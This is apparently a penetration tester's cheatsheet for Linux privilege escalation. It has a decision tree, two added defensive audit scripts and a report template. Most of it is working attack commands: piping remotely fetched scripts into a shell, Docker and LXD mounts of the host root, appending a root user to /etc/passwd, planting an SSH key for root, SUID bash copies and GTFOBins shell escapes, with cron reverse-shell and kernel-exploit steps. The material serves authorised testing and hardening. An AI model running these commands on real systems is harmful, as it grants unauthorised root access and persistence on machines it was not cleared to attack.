🛡️ Methodology Checklist

  • Run automated tool first (LinPEAS / linuxprivchecker)
  • Check all quick-win vectors: sudo -l, SUID, cron, PATH
  • Cross-reference automated findings with manual checklist
  • Attempt highest-confidence vector first
  • Try kernel exploit if all other vectors exhausted
  • Document successful escalation path for report

🎯 Operational Context

Use when: Linux shell obtained — quick enumeration commands to identify privilege escalation paths in under 5 minutes.
Think Dumber First: Four commands: sudo -l, find / -perm -4000 -type f 2>/dev/null, cat /etc/crontab, id. These four cover sudo misconfigs, SUID binaries, cron jobs, and group membership — the four most common Linux privesc categories.
Skip when: Already root — skip enumeration and proceed to post-exploitation objectives.

⚡ Tactical Cheatsheet

  • curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
      → Run LinPEAS directly (no disk write)
  • wget http://[LHOST]/linpeas.sh -O /tmp/lpe.sh && chmod +x /tmp/lpe.sh && /tmp/lpe.sh 2>/dev/null | tee /tmp/lpe.out
      → Transfer + run LinPEAS, save output
  • wget http://[LHOST]/pspy64 -O /tmp/pspy64 && chmod +x /tmp/pspy64 && /tmp/pspy64 -pf -i 1000
      → Transfer + run pspy process monitor
  • screen -v
      → Check screen version (4.5.0 = vulnerable)
  • find / -perm -4000 2>/dev/null | grep screen
      → Confirm SUID screen
  • bash screenroot.sh
      → screen 4.5.0 LPE via ld.so.preload
  • docker run -v /:/mnt --rm -it alpine chroot /mnt sh
      → Docker group escape → root on host
  • lxc init alpine alpine -c security.privileged=true && lxc config device add alpine mydevice disk source=/ path=/mnt/root recursive=true && lxc start alpine && lxc exec alpine /bin/sh
      → LXD group → privileged container → host root
  • openssl passwd -1 [PASS]
      → Generate /etc/passwd hash for user addition
  • echo 'root2:[HASH]:0:0:root:/root:/bin/bash' >> /etc/passwd
      → Add root user if /etc/passwd writable
  • cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash
      → Create SUID bash copy (if running as root from other exploit)
  • /tmp/rootbash -p
      → Execute SUID bash with preserved effective UID

🔬 Deep Dive & Workflow

PrivEsc Decision Tree

Run: sudo -l
└── NOPASSWD entry → GTFOBins → instant win

Run: id
├── docker group → docker container escape
├── lxd group → LXD container mount
├── disk group → read raw disk → /etc/shadow
└── adm group → read logs → credential hunt

Run: find / -user root -perm -4000 2>/dev/null
└── Non-standard SUID → GTFOBins → shell escape
    screen 4.5.0 → ld.so.preload exploit
    pkexec → PwnKit CVE-2021-4034

Run: cat /etc/crontab; pspy64
└── Root cron runs writable script → append reverse shell

Run: uname -a
└── Old kernel → searchsploit "linux kernel [version]"
    → DirtyCow (CVE-2016-5195) for kernels < 4.8.3

Run: getcap -r / 2>/dev/null
└── Dangerous capability (+ep) on python/perl/vim → setuid(0)

LinPEAS Key Output Sections

[*] Sudo version   → searchsploit "sudo [version]"
[*] SUID files     → compare against GTFOBins
[*] Cron jobs      → check writable scripts
[*] Files w/ pass  → grepped credentials
[*] .ssh           → private keys
[*] Network        → internal services on localhost
[*] PATH writable  → PATH hijack opportunity
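The decision tree and the LinPEAS sections above enumerate the same vectors an auditor reviews during hardening. As an added example (not part of the original cheatsheet, and not LinPEAS code), the POSIX shell script below turns three of those branches into filters: each function reads the raw output of the named command on stdin and prints only the entries that need a human decision, so the checks can be run over output captured from many hosts, not just the one you are on. The SUID baseline, the sample outputs and the `--live` switch are this script's own assumptions, not data from any real host.

```shell
#!/bin/sh
# Hardening-review filters for three quick-win vectors from the decision tree.
# Each function reads the raw output of the named command on stdin and prints
# only what needs attention. Added example, not from the original cheatsheet.

# SUID binaries normally expected on a Debian/Ubuntu-style host. Assumption:
# compare against your own golden image rather than trusting this list.
SUID_BASELINE="/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/newgrp /usr/bin/chsh
/usr/bin/chfn /usr/bin/gpasswd /usr/bin/mount /usr/bin/umount /usr/bin/pkexec
/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper"

# stdin: output of `find / -perm -4000 -type f 2>/dev/null`, one path per line.
# stdout: paths absent from the baseline (the "non-standard SUID" branch).
nonstandard_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        known=0
        for base in $SUID_BASELINE; do
            if [ "$path" = "$base" ]; then known=1; break; fi
        done
        if [ "$known" -eq 0 ]; then printf '%s\n' "$path"; fi
    done
    return 0
}

# stdin: output of `getcap -r / 2>/dev/null`, e.g. "/usr/bin/ping cap_net_raw=ep"
# (newer libcap) or "/usr/bin/ping = cap_net_raw+ep" (older libcap).
# stdout: entries whose effective set (flag 'e') includes a capability that lets
# the process change identity or bypass file permissions, on any binary, not only
# interpreters (the "+ep on python/perl/vim" branch, generalised).
risky_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        caps=${line#* }          # text after the first space: the capability clause
        flags=${caps##*[=+]}     # text after the last '=' or '+': the flag letters
        case "$flags" in *e*) ;; *) continue ;; esac
        case "$caps" in
            *cap_setuid*|*cap_setgid*|*cap_dac_override*|*cap_dac_read_search*|*cap_sys_admin*|*cap_sys_ptrace*|*cap_sys_module*)
                printf '%s\n' "$line" ;;
        esac
    done
    return 0
}

# stdin: contents of /etc/group.
# stdout: "group:member" for every member of a group the tree maps to root
# (docker, lxd, disk, adm), so each membership can be justified or removed.
risky_groups() {
    while IFS=: read -r name _pw _gid members; do
        case "$name" in docker|lxd|disk|adm) ;; *) continue ;; esac
        [ -n "$members" ] || continue
        saved_ifs=$IFS; IFS=,
        for m in $members; do printf '%s:%s\n' "$name" "$m"; done
        IFS=$saved_ifs
    done
    return 0
}

# Constructed sample outputs (not captured from a real host) so this runs offline.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/screen
/opt/backup/bkp'
SAMPLE_CAPS='/usr/bin/ping cap_net_raw=ep
/usr/local/bin/python3 cap_setuid=ep
/usr/bin/dumpcap cap_net_admin,cap_net_raw=eip'
SAMPLE_GROUP='root:x:0:
docker:x:999:alice
lxd:x:116:
adm:x:4:syslog,bob
users:x:100:alice,bob'

# --live (this script's own switch) audits the current host; otherwise the samples run.
audit() {
    if [ "$1" = "--live" ]; then
        find / -perm -4000 -type f 2>/dev/null | nonstandard_suid
        getcap -r / 2>/dev/null | risky_caps
        risky_groups < /etc/group
    else
        printf '%s\n' "$SAMPLE_SUID" | nonstandard_suid
        printf '%s\n' "$SAMPLE_CAPS" | risky_caps
        printf '%s\n' "$SAMPLE_GROUP" | risky_groups
    fi
}

audit "$@"
```

On the samples the script reports /usr/bin/screen and /opt/backup/bkp as non-baseline SUID files, the python3 binary with cap_setuid in its effective set, and the docker and adm memberships; the capability filter reads the flag letters after the last '=' or '+' rather than searching the whole line for an 'e', because capability names themselves contain that letter.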

Container Escapes

# Docker group → mount host root
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# Verify inside container:
cat /mnt/etc/shadow   # = host shadow file

# Add root SSH key:
mkdir /mnt/root/.ssh
echo "[YOUR_PUBKEY]" >> /mnt/root/.ssh/authorized_keys

screen 4.5.0 LPE Summary

1. Verify: screen -v → 4.05.00
2. Verify: find / -perm -4000 2>/dev/null | grep screen
3. Transfer screenroot.sh → bash screenroot.sh
   (compiles libhax.so → forces load via ld.so.preload → SUID rootshell)
4. /tmp/rootshell → root shell
No gcc on target: compile libhax.so + rootshell on Kali (match arch), transfer to /tmp/

GTFOBins Quick Hits

  • find: find . -exec /bin/sh -p \; -quit
  • python/python3: python3 -c 'import os; os.execl("/bin/sh","sh","-p")'
  • vim/vi: :set shell=/bin/bash then :shell, or :!/bin/bash
  • less/more: !/bin/sh
  • awk: awk 'BEGIN {system("/bin/sh")}'
  • bash (SUID): /bin/bash -p
  • nmap: nmap --interactive then !sh (old nmap)
  • cp: cp /bin/sh /tmp && chmod +s /tmp/sh && /tmp/sh -p

🛠️ Troubleshooting & Edge Cases

  • Problem: sudo -l shows nothing
    Cause: No sudo configured for this user
    Fix: User not in sudoers; check group membership with id for sudo/wheel/admin groups
  • Problem: SUID find returns too many results
    Cause: System SUID binaries included
    Fix: Filter to non-standard: find / -perm -4000 -type f 2>/dev/null | grep -Ev '^/usr/bin/|^/bin/' (grep -E is required for the | alternation; this also hides anything dropped into those directories, so compare against a known-good baseline when you can)
  • Problem: Cron jobs not visible
    Cause: User crontabs separate from system
    Fix: Check crontab -l for current user; ls /var/spool/cron/crontabs/ for all users (needs root)
  • Problem: LinPEAS not available
    Cause: No internet or restricted shell
    Fix: Use this quick reference for manual checks; all commands here work on minimal installs
  • Problem: No obvious privesc path
    Cause: All standard checks clean
    Fix: Check capabilities (getcap -r / 2>/dev/null), writable /etc/passwd, docker/lxd group, NFS no_root_squash
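The cron rows above and the "root cron runs writable script" branch of the decision tree come down to one question an auditor can answer mechanically: does any root job point at a script that a non-root user could modify? As an added example (not part of the original cheatsheet), the POSIX shell script below parses system-crontab lines (minute hour dom month dow user command, or the @reboot/@daily form), takes the first word of the command as the script path, and reports root jobs whose script, or the directory holding it, is group- or world-writable, including a missing script in a writable directory. Reading the write bits from `ls -ld` output, the temporary fixture files, the sample crontab and the `--live` switch are all this script's own assumptions.

```shell
#!/bin/sh
# Auditor-side check for the "root cron runs writable script" branch: parses
# system-crontab lines (min hour dom mon dow user command, or @period user command)
# and reports root jobs whose script, or the directory holding it, is group- or
# world-writable. Added example, not from the original cheatsheet.

# Return 0 if the path's mode (from `ls -ld`) has a group or other write bit.
# Assumption: POSIX `ls -l` layout, so column 6 is group-w and column 9 is other-w.
writable_by_others() {
    mode=$(ls -ld "$1" | cut -c1-10)
    case "$mode" in ?????w*|????????w*) return 0 ;; esac
    return 1
}

# stdin: crontab lines. stdout: "root <script> <reason>" for each risky root job.
writable_root_cron() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*|[A-Za-z_]*) continue ;; esac   # blank, comment, NAME=value
        set -f; set -- $line; set +f                            # split fields without globbing '*'
        case "$1" in
            @*) user=$2; script=$3 ;;                           # @reboot / @daily form
            *)  [ "$#" -ge 7 ] || continue; user=$6; script=$7 ;;
        esac
        [ "$user" = root ] || continue
        case "$script" in /*) ;; *) continue ;; esac            # only absolute paths are checked
        dir=${script%/*}; [ -n "$dir" ] || dir=/
        if [ ! -e "$script" ]; then
            # A missing script in a writable directory can be supplied by anyone.
            writable_by_others "$dir" && printf 'root %s missing, directory writable\n' "$script"
            continue
        fi
        reason=
        writable_by_others "$script" && reason="script writable"
        writable_by_others "$dir" && reason="${reason:+$reason, }directory writable"
        [ -n "$reason" ] && printf 'root %s %s\n' "$script" "$reason"
    done
    return 0
}

# Constructed fixture: temporary scripts with explicit modes and a sample crontab
# (not from a real host). Prints findings with the temp dir shown as TMP.
run_demo() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/safe" "$tmp/open"
    chmod 755 "$tmp/safe"; chmod 777 "$tmp/open"
    printf '#!/bin/sh\n' > "$tmp/safe/backup.sh"; chmod 755 "$tmp/safe/backup.sh"
    printf '#!/bin/sh\n' > "$tmp/safe/rotate.sh"; chmod 777 "$tmp/safe/rotate.sh"
    printf '#!/bin/sh\n' > "$tmp/open/clean.sh";  chmod 755 "$tmp/open/clean.sh"
    sample="# constructed /etc/crontab sample
SHELL=/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
17 *  * * *  root   $tmp/safe/backup.sh
*/5 * * * *  root   $tmp/safe/rotate.sh --quiet
@daily       root   $tmp/open/clean.sh
0 3   * * *  alice  $tmp/safe/rotate.sh
30 2  * * *  root   $tmp/open/gone.sh"
    printf '%s\n' "$sample" | writable_root_cron | sed "s#$tmp#TMP#g"
    rm -rf "$tmp"
}

if [ "$1" = "--live" ]; then
    cat /etc/crontab /etc/cron.d/* 2>/dev/null | writable_root_cron
else
    run_demo
fi
```

The fixture run flags rotate.sh (world-writable file), clean.sh (lives in a world-writable directory) and gone.sh (missing, in a writable directory), and stays silent on backup.sh and on alice's job. Per-user crontabs under /var/spool/cron/crontabs have no user column, so feed those through a separate pass if you extend the check to them.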

📝 Reporting Trigger

Finding Title: Linux Privilege Escalation Vector Identified via Quick Enumeration
Impact: Rapid 5-minute manual enumeration identifies SUID binary abuse, sudo misconfiguration, or cron job hijacking that allows privilege escalation to root without additional exploitation.
Root Cause: Linux system not hardened against standard privilege escalation techniques. Default or misconfigured permissions not reviewed post-deployment.
Recommendation: Run LinPEAS against all Linux systems during hardening reviews. Apply CIS Linux Benchmark. Audit SUID/SGID binaries and remove unnecessary bits. Review sudo configurations against GTFOBins escape catalog.